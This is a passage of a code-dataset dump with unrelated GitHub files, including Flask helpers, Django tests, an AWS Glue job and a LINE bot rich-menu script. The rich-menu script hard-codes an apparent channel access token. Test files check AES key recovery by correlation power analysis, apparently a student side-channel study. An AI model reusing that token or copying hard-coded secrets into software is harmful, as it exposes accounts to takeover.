diff_loader=diff_test_loader, gt_loader=gt_test_loader,\n last_epoch=last_epoch, RESULTS_DIR=RESULTS_DIR, device=device)","repo_name":"jdrego/robust-lensless-reconstruction","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7511,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"10699194506","text":"from app import app, db\nfrom app.models import Map, MapNodeType, MapNode, User, Role\nfrom flask import flash, redirect, url_for\nfrom functools import wraps\nfrom datetime import datetime\nfrom flask_login import current_user\nfrom sqlalchemy import and_, not_, or_\nfrom werkzeug import secure_filename\nimport os\n\n# @map_admin_required decorater, use AFTER login_required\ndef map_admin_required(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n if not current_user.is_map_admin():\n flash(\"You need to be a map admin to perform this action.\", \"danger\")\n return redirect(url_for(\"index\"))\n return f(*args, **kwargs)\n return decorated_function\n\n# find the best available file name for a map node type image\ndef map_node_filename(filename_from_form):\n filename = secure_filename(filename_from_form)\n\n counter = 1\n while os.path.isfile(os.path.join(app.config[\"MAPNODES_DIR\"], filename)):\n split = filename.rsplit(\".\", 1)\n\n # fancy duplication avoidance (tm)\n filename = split[0] + \"-\" + str(counter) + \".\" + split[1]\n counter += 1\n\n return filename\n\n# generate choices for the node type SelectField\ndef gen_node_type_choices():\n choices = [(0, \"choose...\")]\n\n node_types = MapNodeType.query.all()\n\n for node_type in node_types:\n choices.append((node_type.id, node_type.name))\n\n return choices\n\n# generate choices for the submap field\ndef gen_submap_choices(zerochoice=\"*no submap*\"):\n choices = [(0, zerochoice)]\n\n maps = Map.query.all()\n\n for map_ in maps:\n if map_.is_visible:\n choices.append((map_.id, map_.name))\n else:\n choices.append((map_.id, \"(invisible) {0}\".format(map_.name)))\n\n return choices\n\n# get all nodes that are visible for the current user\ndef get_visible_nodes(map_id):\n if current_user.has_admin_role():\n nodes = MapNode.query\n elif current_user.is_map_admin():\n admins = User.query.filter(User.roles.contains(Role.query.get(1)))\n admin_ids = [a.id for a in admins]\n nodes = MapNode.query.filter(not_(and_(MapNode.is_visible == False, MapNode.created_by_id.in_(admin_ids))))\n else:\n nodes = MapNode.query.filter(or_(MapNode.is_visible == True, MapNode.created_by_id == current_user.id))\n\n return nodes.filter_by(on_map=map_id).all()\n\n# get all nodes that are associated with the specified wiki article\ndef get_nodes_by_wiki_id(w_id):\n if current_user.has_admin_role():\n nodes = MapNode.query\n elif current_user.is_map_admin():\n admins = User.query.filter(User.roles.contains(Role.query.get(1)))\n admin_ids = [a.id for a in admins]\n nodes = MapNode.query.filter(not_(and_(MapNode.is_visible == False, MapNode.created_by_id.in_(admin_ids))))\n else:\n nodes = MapNode.query.filter(or_(MapNode.is_visible == True, MapNode.created_by_id == current_user.id))\n\n nodes = nodes.filter_by(wiki_entry_id = w_id).all()\n\n return nodes\n\n# set the last update time for a map\ndef map_changed(id):\n m = Map.query.get(id)\n\n if m != None:\n m.last_change = datetime.utcnow()\n\n db.session.commit()","repo_name":"kartoffelus/archivar","sub_path":"app/map/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"70"}
+{"seq_id":"19731810930","text":"\"\"\"Programa 5_21.py \nDescrição: Reescrever programa listagem 5_14 de forma a continuar executando até que o valor digitado seja 0\nAutor:Cláudio Schefer\nData: \nVersão: 001\n\"\"\"\n\n# Declaração de variáveis\n\nvalor = int(0)\ncédulas = int(0)\natual = int(0)\nsaldo_a_pagar = int(0)\n\n# Entrada de dados\n\ncédulas = 0\natual = 50\nsaldo_a_pagar = valor\n\n\n# Processamento e Saída de dados\n\nwhile True:\n valor = int(input(\"Digite o valor a pagar:\"))\n if valor == 0:\n break\n cédulas = 0\n atual = 50\n saldo_a_pagar = valor\n\n while True:\n \tif atual <= saldo_a_pagar:\n \tsaldo_a_pagar -= atual\n \tcédulas += 1\n \telse:\n \tprint(\"%d cédula(s) de R$%d\" % (cédulas, atual))\n \tif saldo_a_pagar == 0:\n \t\tbreak\n \tif atual == 50:\n \t\tatual = 20\n \telif atual == 20:\n \t\tatual = 10\n \telif atual == 10:\n \t\tatual = 5\n\t \telif atual == 5:\n \t\tatual = 1\n \tcédulas = 0\n\n\n\n","repo_name":"profnssorg/claudioSchefer1","sub_path":"5_21.py","file_name":"5_21.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"27670501266","text":"from django.test import TestCase\nfrom .models import *\nfrom django.contrib.auth.models import User\n\n# Create your tests here.\n\n\nclass TaskTest(TestCase):\n\n def setUp(self):\n self.user = User.objects.create(id=1, username='k')\n self.task = Task.objects.create(id=1,\n creater=self.user,\n start='13:00',\n end='14:00',\n date='2019-06-25',\n Done='NO')\n\n def test_instance(self):\n self.assertTrue(isinstance(self.task,Task))\n\n\n def test_save_task(self):\n self.task.save()\n task = Task.objects.all()\n self.assertTrue(len(task)>0)\n\n def test_delete_task(self):\n self.task.delete()\n task = Task.objects.all()\n self.assertTrue(len(task)==0)\n","repo_name":"odipojames/Softsearch","sub_path":"app/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"2361289334","text":"import requests\nimport json\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\n\nclass RichMenu:\n def __init__(self):\n\n self.headers = {\"Authorization\": \"Bearer 0123456789f0/NwnXZLq5EzaCZc6IJpbxJxR7chgVpU8LQe6VPau8RGfslcxcWeC4rIGOl606sZsWkkAJmzNn+li/QVHDF9h12zVxeqPbb06Tkapffs4uKgHYepd+TdUQCPnAE0jMVhJqXPbmgdB04t89/1O/w1cDnyilFU=\",\n \"Content-Type\": \"application/json\"}\n # Channel Access Token\n self.line_bot_api = LineBotApi('0123456789f0/f0/NwnXZLq5EzaCZc6IJpbxJxR7chgVpU8LQe6VPau8RGfslcxcWeC4rIGOl606sZsWkkAJmzNn+li/QVHDF9h12zVxeqPbb06Tkapffs4uKgHYepd+TdUQCPnAE0jMVhJqXPbmgdB04t89/1O/w1cDnyilFU=')\n\n # 每執行一次 就會建立一次Rich Menu\n def CreateMenu(self):\n body = {\n \"size\": {\n \"width\": 2500,\n \"height\": 843\n },\n \"selected\": \"true\",\n \"name\": \"Controller\",\n \"chatBarText\": \"選單\",\n \"areas\": [\n {\n \"bounds\": {\n \"x\": 6,\n \"y\": 325,\n \"width\": 1251,\n \"height\": 490\n },\n \"action\": {\n \"type\": \"uri\",\n \"uri\": \"https://running-flow-estimate.herokuapp.com/\"\n }\n },\n {\n \"bounds\": {\n \"x\": 1264,\n \"y\": 325,\n \"width\": 1235,\n \"height\": 490\n },\n \"action\": {\n \"type\": \"uri\",\n \"uri\": \"http://countpersonvm.australiacentral.cloudapp.azure.com\"\n }\n }\n ]\n }\n req = requests.request('POST', 'https://api.line.me/v2/bot/richmenu',\n headers=self.headers,data=json.dumps(body).encode('utf-8'))\n richmenuid = json.loads(req.text)\n print(richmenuid)\n return richmenuid[\"richMenuId\"]\n\n # 將圖片上傳 JPG, Size: 2500 * 843 or 2500 * 1686\n # 上傳一次即可,若要更新圖片則帶入 RichMenu Id與新圖片\n def UpRichMenuPhoto(self, richmenuid, imgfile):\n #richmenuid = 'richmenu-1fb28d08ef53bd89fedae13887654321'\n\n try:\n with open(imgfile, 'rb') as f:\n print(richmenuid, ' ', imgfile)\n self.line_bot_api.set_rich_menu_image(richmenuid, \"image/jpeg\", f)\n f.close()\n return True\n except Exception as e:\n print(e)\n return False\n\n # 啟動 rich menu\n def RichMenuEable(self, rich_menu_id):\n richmenuweb = 'https://api.line.me/v2/bot/user/all/richmenu/' + str(rich_menu_id)\n req = requests.request('POST', richmenuweb, headers=self.headers)\n data = json.loads(req.text)\n print(data)\n if bool(data):\n print('Response Info:', data)\n return False\n else:\n print('Response Info:', data)\n return True\n\n # 查看所有 RichMenuList\n def GetRichMenuList(self):\n rich_menu_list = self.line_bot_api.get_rich_menu_list()\n rlist = []\n for rich_menu in rich_menu_list:\n #print(rich_menu.rich_menu_id)\n rlist.append(rich_menu.rich_menu_id)\n return rlist\n\n\n # 刪除 RichMenuList\n def DelRichMenuList(self, rich_menu_id):\n self.line_bot_api.delete_rich_menu(str(rich_menu_id))\n rlist = self.GetRichMenuList()\n return rlist\n\nif __name__=='__main__':\n rm = RichMenu()\n print(rm.GetRichMenuList())\n","repo_name":"3probedata/linechatbotAPP","sub_path":"richmenu.py","file_name":"richmenu.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"58912950","text":"import sys\nimport os\nfrom PIL import Image\n\n\ndef convert(source, dest='png'):\n \"\"\"\n converts jpeg files from source directory to png in dest directory\n \"\"\"\n dest_path = os.path.join(os.getcwd(), dest)\n os.makedirs(dest_path, exist_ok=True)\n source_path = os.path.join(os.getcwd(), source)\n for file in os.listdir(source_path):\n if os.path.isfile(os.path.join(source_path, file)):\n if file.lower().endswith('jpeg') or file.lower().endswith('jpg'):\n img = Image.open(os.path.join(source_path, file))\n f, e = file.split('.')\n dest_file_name = os.path.join(dest_path, f + '.png')\n img.save(dest_file_name, 'png')\n\n\nif __name__ == '__main__':\n source_folder = os.getcwd()\n try:\n source_folder = sys.argv[1]\n dest_folder = sys.argv[2]\n except IndexError:\n print(f'1 or 2 paths not given - converting from {source_folder} to png directory')\n try:\n convert(source_folder, dest_folder)\n except NameError:\n convert(source_folder)\n","repo_name":"evgenyrinkevich/Image_Processing","sub_path":"JPEGtoPNGconverter.py","file_name":"JPEGtoPNGconverter.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"41332578177","text":"from turtle import title\nimport openpyxl\nfrom html_utils import get_background\nfrom test_pages.files import test_pages\nfrom bs4 import BeautifulSoup, ResultSet, Tag\nfrom openpyxl.styles import PatternFill, Border, Side, Alignment, Font\nfrom openpyxl.worksheet.worksheet import Worksheet\nfrom openpyxl.workbook.workbook import Workbook\nfrom openpyxl.cell.cell import Cell\nfrom openpyxl.utils.dataframe import dataframe_to_rows\n\nfrom utils.excel import delete_empty_columns, fit_column_width, is_merged_cell, set_value\n\nPARSER = \"html5lib\"\n\n\ndef format_sheet(sheet: Worksheet):\n first_row = 4\n last_col = sheet.max_column\n\n sheet.row_dimensions[first_row].height = 120 # type:ignore\n\n first_cell = sheet['A4']\n first_cell.alignment = Alignment(\n vertical='center', horizontal='left', wrap_text=True)\n\n for row in sheet.iter_rows(min_row=first_row):\n for c in row:\n cell: Cell = c\n if cell.column == last_col:\n sheet.merge_cells(start_row=cell.row, end_row=cell.row,\n start_column=last_col, end_column=last_col+3)\n for row in sheet.iter_rows(min_row=first_row):\n for c in row:\n cell: Cell = c\n cell.border = Border(left=Side(style='thin'),\n right=Side(style='thin'),\n top=Side(style='thin'),\n bottom=Side(style='thin'))\n\n fit_column_width(sheet, 'B')\n fit_column_width(sheet, 'C')\n\n\ndef write_to_sheet(sheet: Worksheet, html_table: ResultSet[Tag]):\n for tr_i, tr in enumerate(html_table, start=1):\n col_i = 1\n for td in tr.find_all('td'):\n cell: Cell = sheet.cell(row=tr_i, column=col_i)\n text = td.get_text(strip=True)\n if tr_i == 4 and col_i == 1:\n text = td.get_text(separator='\\n', strip=True).splitlines()\n text = \"\\n\".join(text[:-1])\n if not is_merged_cell(sheet, cell):\n set_value(cell, text)\n if td.get('colspan'):\n span = int(td.get('colspan'))\n col_i += span\n sheet.merge_cells(start_row=cell.row, end_row=cell.row,\n start_column=cell.column, end_column=cell.column+(span-1))\n cell.alignment = Alignment(\n horizontal='center', vertical='center')\n else:\n col_i += 1\n\n # Add background color if any\n bg_color = openpyxl.styles.PatternFill( # type: ignore\n start_color=get_background(td), end_color=get_background(td), fill_type=\"solid\")\n cell.fill = bg_color\n format_sheet(sheet)\n\n\ndef html_to_excel():\n workbook = Workbook()\n sheet: Worksheet = workbook.active\n\n with open(test_pages(\"graderesult.php.html\")) as file:\n html = file.read()\n soup = BeautifulSoup(html, PARSER)\n table = soup.select('.ewReportTable tr')\n write_to_sheet(sheet, table)\n\n workbook.save(\"data.xlsx\")\n\n\ndef main():\n html_to_excel()\n\n\nif __name__ == '__main__':\n print(main())\n","repo_name":"limkokwing-projects/result-remarks","sub_path":"test_two.py","file_name":"test_two.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9216014586","text":"import sys\r\nfrom awsglue.transforms import *\r\nfrom awsglue.utils import getResolvedOptions\r\nfrom pyspark.context import SparkContext\r\nfrom awsglue.context import GlueContext\r\nfrom awsglue.job import Job\r\nimport pyspark.sql.functions as F\r\nfrom awsglue.dynamicframe import DynamicFrame\r\nfrom pyspark.sql.window import Window\r\nimport uuid\r\nfrom datetime import datetime\r\ncurrent_date = datetime.now().strftime(\"%Y-%m-%d\")\r\n\r\nargs = getResolvedOptions(sys.argv, [\"JOB_NAME\",\"file_path\",\"key\"])\r\nsc = SparkContext()\r\nglueContext = GlueContext(sc)\r\nspark = glueContext.spark_session\r\njob = Job(glueContext)\r\njob.init(args[\"JOB_NAME\"], args)\r\nfile_path=args[\"file_path\"]\r\n# Script generated for node S3 bucket\r\nS3bucket_node1 = glueContext.create_dynamic_frame.from_options(\r\n format_options={},\r\n connection_type=\"s3\",\r\n format=\"avro\",\r\n connection_options={\r\n \"paths\": [args[\"file_path\"]],\r\n \"recurse\": True,\r\n },\r\n transformation_ctx=\"S3bucket_node1\",\r\n)\r\ndf = S3bucket_node1.toDF()\r\n\r\nimport boto3\r\n\r\n# Define the source and destination paths\r\nsource_bucket = \"groupno6\"\r\nsource_key = args[\"key\"]\r\nnames=source_key.split(\"/\")\r\ndestination_bucket = \"groupno6\"\r\ndestination_key = f\"aws-project-2/archive/{names[-1]}\"\r\n\r\n# Create a new S3 client using the default AWS credentials\r\ns3_client = boto3.client(\"s3\")\r\n\r\n# Copy the file from the source to the destination\r\ns3_client.copy_object(\r\n Bucket=destination_bucket,\r\n Key=destination_key,\r\n CopySource={\r\n \"Bucket\": source_bucket,\r\n \"Key\": source_key\r\n }\r\n)\r\n\r\n# Delete the file from the source folder\r\ns3_client.delete_object(\r\n Bucket=source_bucket,\r\n Key=source_key\r\n)\r\n\r\ndef generate_unique_id():\r\n unique_id = str(uuid.uuid4().int)[:5]\r\n unique_id = int(unique_id)\r\n return unique_id\r\n\r\n# Example usage\r\nid_int = generate_unique_id()\r\n# Perform the operations and create the final DataFrame\r\nwindow = Window.orderBy(F.lit(1)) \r\n\r\n# Unbounded window specification\r\nresult_df = df.selectExpr(\r\n 'concat(\"DIS_\", Tran_ref_id) AS voucher_code',\r\n '\"C\" AS txn_type',\r\n '1 AS source_system_id',\r\n 'date_format(to_date(Transaction_dt, \"dd-MMM-yy\"), \"yyyy-MM-dd\") AS txn_date',\r\n 'Tran_ref_id AS source_system_txn_id',\r\n 'explode(array(concat(\"A101 \", amt), concat(\"A104 \", gst), concat(\"A105 \", custom_duty))) AS txn_amt'\r\n).select(\r\n F.concat(F.lit(id_int),F.row_number().over(window)).cast(\"integer\").alias(\"txn_id\"),\r\n F.col(\"voucher_code\"),\r\n F.col(\"txn_type\"),\r\n F.col(\"txn_date\"),\r\n F.split(\"txn_amt\", \" \")[0].alias(\"acc_no\"),\r\n F.split(\"txn_amt\", \" \")[1].alias(\"txn_amt\"),\r\n F.lit(1).alias(\"source_system_id\"),\r\n F.col(\"source_system_txn_id\")\r\n)\r\n\r\n\r\nfailed_df = result_df.filter(F.col(\"txn_date\") > current_date)\r\nresult_df = result_df.filter(F.col(\"txn_date\") <= current_date)\r\n\r\nfailed_dynamic_frame = DynamicFrame.fromDF(failed_df, glueContext, \"failed_dynamic_frame\")\r\noutput_dynamic_frame = DynamicFrame.fromDF(result_df, glueContext, \"output_dynamic_frame\")\r\n\r\n# Script generated for node S3 bucket\r\nglueContext.write_dynamic_frame.from_options(\r\n frame=output_dynamic_frame,\r\n connection_type=\"dynamodb\",\r\n connection_options={\r\n \"dynamodb.region\": \"us-east-1\",\r\n \"dynamodb.output.tableName\": \"group6-transaction_table\",\r\n }\r\n)\r\nS3bucket_node3 = 
glueContext.write_dynamic_frame.from_options(\r\n frame=failed_dynamic_frame,\r\n connection_type=\"s3\",\r\n format=\"csv\",\r\n connection_options={\"path\": \"s3://groupno6/aws-project-2/failed-records/\", \"partitionKeys\": []},\r\n transformation_ctx=\"S3bucket_node3\",\r\n)\r\n\r\njob.commit()","repo_name":"sathyaagovindarajan/AWS-PROJECT","sub_path":"PROJECT 2/GLUEJOB/PROJECT2_AVRO_GLUEJOB.py","file_name":"PROJECT2_AVRO_GLUEJOB.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"33310869059","text":"# coding:utf-8\n\nfrom ..pyfunctions.function_object import FunctionObject\nfrom ..pysysutils import global_variables as gv\nfrom ..pysysutils.py_calc_log import log\nfrom sqlalchemy import text\nfrom ...utils import add_months\n\n\nclass PyFunction(FunctionObject):\n \"\"\"\n Desc: 获取产假信息函数\n Author: David\n Date: 2020/12/18\n \"\"\"\n\n __slots__ = ['id', 'country', 'desc', 'descENG',\n 'func_type', 'instructions', 'instructionsENG']\n\n def __init__(self):\n super(PyFunction, self).__init__()\n\n self.id = 'FC_GET_MATERNITY_LEAVE'\n self.country = 'CHN'\n self.desc = '获取产假信息函数'\n self.descENG = '获取产假信息函数'\n self.func_type = 'A'\n self.instructions = \"获取产假信息函数。输入参数:无。输出参数:产假开始日期、产假时长\"\n self.instructionsENG = self.instructions\n\n self.log_flag = gv.get_run_var_value('LOG_FLAG')\n if self.log_flag == 'Y':\n self.trace_dic = {\n 'id': self.id,\n 'desc': self.desc,\n 'type': 'FC',\n 'fc_obj': self,\n 'WC': [],\n 'WT': [],\n 'VR': [],\n 'PA': []\n }\n else:\n self.trace_dic = {}\n\n @log()\n def func_exec(self):\n db = gv.get_db()\n catalog = gv.get_run_var_value('PY_CATALOG')\n # 从请假记录中取值,历经期开始日期前18个月的产假记录中,取最小的开始日期;累计期间内产假总时长\n f_prd_bgn_dt = catalog.f_prd_bgn_dt\n begin_date = add_months(f_prd_bgn_dt, -18)\n t = text(\n \"select hhr_start_dt, hhr_hour_amount from boogoo_attendance.hhr_pt_emp_leave_rec where tenant_id = :b1 and hhr_empid = :b2 \"\n \"and hhr_start_dt BETWEEN :b3 and :b4 and hhr_pt_code = :b5 order by hhr_start_dt asc\")\n rs = db.conn.execute(t, b1=catalog.tenant_id, b2=catalog.emp_id, b3=begin_date, b4=f_prd_bgn_dt, b5='0005').fetchall()\n i = 0\n start_dt = None\n hour_amt = 0\n for row in rs:\n if i == 0:\n start_dt = row['hhr_start_dt']\n hour_amt += (0 if row['hhr_hour_amount'] is None else row['hhr_hour_amount'])\n i += 1\n return start_dt, hour_amt\n","repo_name":"pmxly/pypayroll","sub_path":"payroll/pyfunctions/FC_GET_MATERNITY_LEAVE.py","file_name":"FC_GET_MATERNITY_LEAVE.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"31109009911","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# The smallest number expressible as the sum of a prime square, prime cube, and prime fourth power is 28. In fact, there are exactly four numbers below fifty that can be expressed in such a way:\n# 28 = 2^2 + 2^3 + 2^4\n# 33 = 3^2 + 2^3 + 2^4\n# 49 = 5^2 + 2^3 + 2^4\n# 47 = 2^2 + 3^3 + 2^4\n# How many numbers below fifty million can be expressed as the sum of a prime square, prime cube, and prime fourth power?\n# Sınır değerini 50 milyonun karekökü civarında almak yeterli güvenlik seviyesini sağlıyor.\n\nfrom sympy import primerange\n\nLIMIT = 50000000\nprimes = list(primerange(2,int(LIMIT**0.5)))\nsonuc = set()\n\nfor a in primes:\n for b in primes:\n for c in primes:\n if(a**2+b**3+c**4 Tracker: {}\".format(tracker_name))\n logging.info(\" > Endpoint URL: {}\".format(endpoint_url))\n logging.info(\" > API key: {}\".format(api_key))\n logging.info(\" > Speed: {} m/s\".format(speed))\n logging.info(\" > Interval: {} seconds\".format(interval))\n\n devices = get_devices(endpoint_url, api_key)\n\n for device in devices:\n t = threading.Thread(target=process_device, args=(device, speed, interval, tracker_name))\n t.start()\n\n\nif __name__ == '__main__':\n format = \"%(asctime)s: %(message)s\"\n logging.basicConfig(format=format, level=logging.INFO)\n parser = argparse.ArgumentParser(description='Update the location of devices.')\n parser.add_argument('--tracker-name',\n required=True,\n help='The name of the Amazon Location Service tracker.')\n parser.add_argument('--endpoint-url',\n help='The URL of the API endpoint (defaults to http://localhost:3000).',\n default='http://localhost:3000')\n parser.add_argument('--api-key',\n help='The API key used to authenticate requests to the API')\n parser.add_argument('--interval',\n type=int,\n help='How much time (in seconds) to wait between updates (defaults to 2).',\n default=2)\n parser.add_argument('--speed',\n type=int,\n help='The speed (in m/s) at which all devices move around the map (defaults to 25)',\n default=25)\n\n args = parser.parse_args()\n main(args.tracker_name, args.endpoint_url, args.api_key, args.speed, args.interval)\n","repo_name":"carlosafonso/amazon-location-demo","sub_path":"scripts/update_locations.py","file_name":"update_locations.py","file_ext":"py","file_size_in_byte":3530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"25824609816","text":"import unittest\nimport csv\nfrom CPA import CPA\nimport difflib\n\n\nclass TestCPA(unittest.TestCase):\n\n def testInitTestMatrix(self):\n cpa = CPA()\n cpa.initTraceMatrix()\n\n rowCount = 100\n traceCount = 2500\n\n self.assertEqual(len(cpa.plainText), rowCount)\n self.assertEqual(len(cpa.cipherText), rowCount)\n self.assertEqual(len(cpa.traceMatrix), rowCount)\n for row in cpa.traceMatrix:\n self.assertEqual(len(row), traceCount)\n self.assertEqual(type(row), list)\n for col in row:\n self.assertEqual(type(col), float)\n self.assertEqual(cpa.numberOfTraces, rowCount)\n self.assertEqual(cpa.numberOfTracesPoint, traceCount)\n\n def testCorrelation(self):\n cpa = CPA()\n cpa.initTraceMatrix()\n cpa.initHypothesis_MCU8_AES128(1)\n cpa.findCorrelation()\n\n traceFile = 'intermediate/waveform.csv'\n \n rowTable = open(traceFile, newline='').readlines()\n for count in range(0,255):\n \n rowString = rowTable[count]\n testCaseString = ','.join(format(x, \".5f\") for x in cpa.correlation[count])\n rowStringLength = len(rowString)\n rowStringLength = rowStringLength - 8 # idk why its diff (Nan vs actual value) sx on java is 0.0\n self.assertEqual(testCaseString[0:rowStringLength] == rowString[0:rowStringLength], True)\n\n def testWaveform(self):\n cpa = CPA()\n results = cpa.CPA()\n self.assertEqual(results[\"key\"].strip(), \"78 A4 30 47 95 7D 4C 21 81 5D E6 72 0E AD 6F 41\")\n\n # def testWaveform2(self):\n # CPA.tracefile\n \n# if __name__ == '__main__':\n# unittest.main()\n\n# waveform.csv\n# 78 A4 30 47 95 7D 4C 21 81 5D E6 72 0E AD 6F 41 \n\n# waveform_HS.csv\n# 48 9D B4 B3 F3 17 29 61 CC 2B CB 4E D2 E2 8E B7","repo_name":"Chiku-debug/Correlation-Power-Analysis-Attack","sub_path":"Project/CPA-Tool/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"35963620544","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom scribus import *\nmargins = (36, 36, 0, 0)\n\n# Dictionary of logos' height/width aspect ratios. It is used to position the school logo\n# There's no way to programatically adjust frame to image.\n# The Python Scribus uses doesn't have any image utilities like PIL so I could not\n# figure out a way to determine the image's aspect ratio programatically. :|\n# There is a program I wrote called Logo_aspect_ratio.py that takes all the images files\n# in a directory and generates a CSV file of their width and height. The program is located in \n# the Women directory. After you run that program, you can run this one.\n\nschool_logos_dict = {}\nwith open(\"./School_Logos/filesizes_gif.csv\") as f:\n for line in f:\n current_line_list = line.split(\",\")\n school_logos_dict[current_line_list[0]] = float(current_line_list[2]) / float (current_line_list[1])\n\nconf_logos_dict = {}\nwith open(\"./Conference_Logos/filesizes_png.csv\") as f:\n for line in f:\n current_line_list = line.split(\",\")\n conf_logos_dict[current_line_list[0]] = float(current_line_list[2]) / float (current_line_list[1])\n \nplayers_list = []\nplayers_names_list = []\nwith open(\"Beach_VB_action.csv\") as f:\n next(f) # skip headers row\n for line in f:\n current_line_list = line.split(\",\")\n full_name = current_line_list[0].split()\n first_name = full_name[0]\n first_last_name = full_name[1]\n if (full_name[1] == \"de\" or full_name[1] == \"La\"):\n player_name = full_name[0] + \" \" + full_name[1] + \" \" + full_name[2]\n if (player_name in players_names_list): \n player_name_count = sum([1 for plyr in players_names_list if plyr == player_name])\n image_filename = \"./Beach_VB_action/\" + first_name + \"_\" + full_name[1] + \"_\" + full_name[2] + \"_\" + str(player_name_count + 1) + \".jpg\"\n else:\n image_filename = \"./Beach_VB_action/\" + first_name + \"_\" + full_name[1] + \"_\" + full_name[2] + \".jpg\"\n else:\n player_name = first_name + \" \" + first_last_name\n if (player_name in players_names_list): \n player_name_count = sum([1 for plyr in players_names_list if plyr == player_name])\n image_filename = \"./Beach_VB_action/\" + first_name + \"_\" + first_last_name + \"_\" + str(player_name_count + 1) + \".jpg\"\n else:\n image_filename = \"./Beach_VB_action/\" + first_name + \"_\" + first_last_name + \".jpg\"\n \n negron_santos = \"Alejandra Negrón & Karla Santos\"; santos_negron = \"Karla Santos & Alejandra Negrón\"\n negron_santos_2 = \"Alejandra Negrón & Karla Santos 2\"; negron_santos_3 = \"Alejandra Negrón & Karla Santos 3\"\n \n if (current_line_list[0] == negron_santos):\n player_name = negron_santos\n image_filename = \"./Beach_VB_action/\" + negron_santos.replace(\" \", \"_\") + \".jpg\"\n elif (current_line_list[0] == santos_negron):\n player_name = santos_negron\n image_filename = \"./Beach_VB_action/\" + santos_negron.replace(\" \", \"_\") + \".jpg\"\n elif (current_line_list[0] == negron_santos_2):\n player_name = negron_santos\n image_filename = \"./Beach_VB_action/\" + negron_santos_2.replace(\" \", \"_\") + \".jpg\"\n elif (current_line_list[0] == negron_santos_3):\n player_name = negron_santos\n image_filename = \"./Beach_VB_action/\" + negron_santos_3.replace(\" \", \"_\") + \".jpg\"\n \n player_school = current_line_list[1]\n school_state = current_line_list[2]\n school_division = current_line_list[3]\n photo_credit = current_line_list[4]\n \n single_player_list = [player_name, image_filename, player_school, 
school_state, school_division, photo_credit]\n players_list.append(single_player_list)\n players_names_list.append(player_name)\n\n\nif newDocument(PAPER_LETTER, margins, PORTRAIT, 1, UNIT_POINTS, NOFACINGPAGES, FIRSTPAGERIGHT, 1):\n\n defineColor(\"NJCAA Blue\", 217, 168, 55, 94)\n defineColor(\"NJCAA Gray\", 0, 0, 0, 40)\n defineColor(\"NJCAA Gray 2\", 0, 0, 0, 153)\n defineColor(\"NJCAA Blue 2\", 221, 168, 15, 30)\n defineColor(\"Darker Gray\", 0, 0, 0, 64)\n defineColor(\"Beach VB\", 154, 50, 0, 0)\n \n # top_right_rect = createRect(306, 36, 306, 180)\n # setFillColor(\"NJCAA Gray\", top_right_rect); setLineColor(\"NJCAA Gray\", top_right_rect)\n # second_rect = createRect(0, 216, 306, 180)\n # setFillColor(\"NJCAA Gray\", second_rect); setLineColor(\"NJCAA Gray\", second_rect)\n # third_rect = createRect(306, 396, 306, 180)\n # setFillColor(\"NJCAA Gray\", third_rect); setLineColor(\"NJCAA Gray\", third_rect)\n # top_left_rect = createRect(0, 576, 306, 180)\n # setFillColor(\"NJCAA Gray\", top_left_rect); setLineColor(\"NJCAA Gray\", top_left_rect)\n \n num_players = len(players_list)\n if (num_players % 8) == 0: \n num_pages = (num_players / 8) \n else: \n num_pages = (num_players / 8) + 1\n player_count = 0\n for page in range(num_pages):\n top_rect = createRect(0, 0, 612, 36)\n setFillColor(\"Beach VB\", top_rect); setLineColor(\"Beach VB\", top_rect)\n bottom_rect = createRect(0, 756, 612, 36)\n setFillColor(\"Beach VB\", bottom_rect); setLineColor(\"Beach VB\", bottom_rect)\n center_rect = createRect(0, 36, 612, 720)\n setFillColor(\"White\", center_rect); setLineColor(\"White\", center_rect)\n \n page_header = createText(36, 9, 540, 36)\n setText(\"Beach Volleyball Action\", page_header)\n setTextColor(\"White\", page_header)\n setFont(\"OLD SPORT 02 ATHLETIC NCV Regular\", page_header); setFontSize(24, page_header)\n setTextAlignment(ALIGN_CENTERED, page_header)\n \n years1 = createText(0, 6.7, 36, 36); setText(\"2019\" + \"\\n\" + \"-\" + \"\\n\" + \"2020\", years1)\n years2 = createText(576, 6.7, 36, 36); setText(\"2019\" + \"\\n\" + \"-\" + \"\\n\" + \"2020\", years2)\n setTextColor(\"White\", years1); setTextColor(\"White\", years2)\n setFont(\"OLD SPORT 02 ATHLETIC NCV Regular\", years1); setFontSize(11, years1); setTextAlignment(ALIGN_CENTERED, years1)\n setFont(\"OLD SPORT 02 ATHLETIC NCV Regular\", years2); setFontSize(11, years2); setTextAlignment(ALIGN_CENTERED, years2)\n setLineSpacing(7, years1); setLineSpacing(7, years2) \n \n # Asterisk for Bernier and Torruella\n if page == 0:\n footer_asterisk = createText(36, 764, 5, 34)\n setText(\"*\", footer_asterisk); 